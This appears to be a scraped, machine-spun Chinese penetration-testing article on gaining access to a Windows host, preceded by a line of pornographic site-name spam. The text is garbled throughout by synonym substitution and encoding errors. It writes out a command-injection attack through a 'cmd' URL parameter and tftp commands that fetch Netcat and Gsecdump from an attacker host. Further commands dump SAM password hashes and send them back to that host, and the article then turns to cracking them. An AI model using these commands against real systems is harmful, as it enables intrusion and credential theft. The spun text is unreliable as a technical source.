国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　在文章《企業(yè)若何自行查抄縫隙之掃描與列舉》中我們講到若何找到企業(yè)系統(tǒng)中的縫隙，并有效地揭露這些縫隙。時到今日，粉碎一個收集或信息系統(tǒng)的根基過程并沒有太多改變。這些步調(diào)根基說來就是：1、履行窺伺;2、掃描和列舉;3、獲得拜候權;4、晉升特權;5、保持拜候并袒護蹤跡。下面，我們就具體介紹一下第三步“獲得拜候權”。

　　獲得拜候權

　　此刻可以決定是不是對SMB辦事器進行有效報復打擊了。長途操縱某種有縫隙辦事的一個常常利用東西是Metasploit，這是一個開源的矯捷且易于利用的縫隙操縱框架。

　　與Nessus很類似，Metasploit具有Web界面和一個撐持用戶選擇方針或收集的領導。安然評估者可以跳過領導，開端長途操縱SMB辦事器的縫隙，然后，你會看到一個在長途機械上的號令提示符，而這恰是黑客的最愛。在“自攻”期間，真?？茨愕南到y(tǒng)不會達到這一步。

　　記住，非論是出于甚么目標和意圖，任何辦事或端口都可能存在足以粉碎主機的縫隙。你該當查抄掃描陳述中發(fā)現(xiàn)的所有標題問題，其實不竭地反復這些步調(diào)直至查抄完每個項目。

　　例如，掃描陳述呈現(xiàn)如許的內(nèi)容：

　　2869/tcp - http Microsoft HTTP API httpd 1.0 (SSDP/UPnP)

　　當然Nmap可能沒法獲得哪些法度正在運行的信息，但這兒需要寄望的關頭字母是“API”，即“利用編程接口”。因此，我們幾近可以必定：這里有一個經(jīng)由過程Windows的HTTP辦事而起感化的特定利用法度。

　　定制的利用法度帶來了特別堅苦，因為并沒有哪一種特定東西可以報復打擊這類法度。在這兒，無妨考慮一下Fuzzing這類軟件測試手藝，它通常為主動化或半主動化的，可以或許將不法的、非正常的或隨機數(shù)據(jù)提交給某個計較機法度的輸進。然后，監(jiān)督該法度的例外環(huán)境，如解體或沒法實現(xiàn)內(nèi)建的代碼功能，或查找暗藏的內(nèi)存泄漏等。Fuzzing確切正視定制的利用或不服常的法度實現(xiàn)。

　　還有，要求拜候http://123.123.123.123:2869返回了一個404“not found(未發(fā)現(xiàn))”的弊端。這就表白，有可能存在我們可以拜候的目次或號令，而這恰是JBroFuzz顯示身手的處所。

　　利用JBroFuzz,你可以經(jīng)由過程任何編制報復打擊一個特定的利用法度，此中包含用戶代辦署理字符串(用來辯白瀏覽器版本和向用戶所拜候的網(wǎng)站辦事器供給某些系統(tǒng)信息的細節(jié))、編制，和get和post變量等。在良多環(huán)境下，這不是一個可否攻破方針的標題問題，而是甚么時辰攻破的標題問題。并不是所有的弊端或例外城市導致長途的縫隙操縱，但評估人員該當細心查抄任何標題問題，以便于發(fā)現(xiàn)風險。本文的測試觸及到HTTP，但良多和談都足乃至使報復打擊收集辦事和本地辦事。假定你需要更多的矯捷性，無妨考慮Peachfuzzer。

　　在本文的測試中，作者發(fā)現(xiàn)了這個URL：

　　http://123.123.123.123:2869/cmd=echo%20%22log%20entry%20%251%22%20%3E%20ap p.log%20

　　假定我們利用一個WebScarab或JBroFuzz編碼器之類的東西來解碼這個URL，便可以看出，“cmd”變成了“l(fā)og entry%1”>app.log

　　這里看起來是經(jīng)由過程把持系統(tǒng)的號令即將動靜發(fā)送給app.log文件，從而成立一個日記文件，也就是說，Web辦事器的辦事正在調(diào)用文件系統(tǒng)。這類類型的直接拜候可以成立某些縫隙掃描器可能漏掉的縫隙操縱前提。

　　這也會給報復打擊者供給了機緣，但起首還得解決其它標題問題。有大都環(huán)境下，Web其實不會以治理員特權的編制來運行。不管你若何獲得系統(tǒng)的拜候權，都可利用這些號令。這些號令僅要求你可以或許拜候號令詮釋器。

　　>test號令可以驗證我們的報復打擊是不是供給反饋(例如，其實不把test當作內(nèi)部或外部號令、可把持的法度或批措置文件)。

　　假定我們獲得弊端動靜，就會從報復打擊中獲得成果。

　　在我們的Web報復打擊中，我們可以簡單地在瀏覽器地址欄中輸進：http://123.123.123.123:2869/?cmd=test

　　這會導致瀏覽器返回一個弊端。不然，就意味著我們不會獲得及時反饋。

　　下一步的測試是查看我們是誰：

　　http:// 123.123.123.123:2869/?cmd=whoami

　　此時的響應會奉告我們用戶賬戶的名稱，即Web辦事的運行賬戶。此刻，我們看看構成員身份是甚么：

　　http:// 123.123.123.123:2869/?cmd=net user

　　這時候的響應與下圖近似：

　　可以看出，此時并沒有以治理員身份運行，這會給黑客帶來標題問題。事實上，在黑客獲得了系統(tǒng)拜候后，特權晉升幾近總會成為報復打擊者的首要方針。報復打擊者可經(jīng)由過程量種編制實現(xiàn)此方針，此中包含暴力破解治理員賬戶。有時，報復打擊者可能會操縱把持系統(tǒng)或已安裝軟件中的本地縫隙來擴大年夜拜候權。

　　在此例中，我們(報復打擊者)具有了把持系統(tǒng)的號令拜候權，并且我們也能夠拜候文件系統(tǒng)。因此，我們可以經(jīng)由過程迂回戰(zhàn)術來獲得治理員賬戶。為有效地占據(jù)主機(包含霸占治理員賬戶)，需要做點兒預備工作。

　　起首，我們成立一個TFTP(簡單文件傳輸和談)辦事器。當然，這項工作很簡單，網(wǎng)上的教程有良多，在此不贅述。然后，下載下面的幾種東西，并將其放到TFTP的根文件夾中：

　　Netcat：黑客東西的瑞士軍刀;Gsecdump，承諾用戶從SAM(安然賬戶治理器)數(shù)據(jù)庫中析取口令哈希。利用把持系統(tǒng)號令行縫隙，我們將東西下載到方針機械中：http://123.123.123.123:2869/?cmd=tftp attackercomputer.com GET *

　　利用Gsecdump,可以從系統(tǒng)中析取哈希，并導進到一個可發(fā)送給報復打擊者機械的文本文件中。http://123.123.123.123:2869/?cmd= gsecdumpv2b5.exe –a >hashes.txt

　　http://123.123.123.123:2869/?cmd=tftp attackyourcomputer.com PUT hashes.txt hashes.txt

　　此刻，我們需要做的是破解哈希并獲得口令。

　　回到報復打擊電腦上，我們可以在Windows下安裝Cain &Abel 或在Linux上安裝John the Ripper。

　　在利用Cain&Abel的測試中，我們可以輕松地導進文本文件，并可以實施強力報復打擊或字典報復打擊。(強力報復打擊測驗測驗每個字符組合，而字典報復打擊必需具有一個包含單詞或單詞變體的文件。)我們還可利用預編譯強力報復打擊和字典報復打擊的彩虹表。當然，每種編制都有其好處和錯誤謬誤，而你該當起首測驗測驗字典報復打擊，因為其速度很快。但這類報復打擊不太周全。

　　有時，要破解一個口令可能需要幾天或幾禮拜的時候。假定一個口令利用了復雜法則，那么，你可能畢生也沒法破解。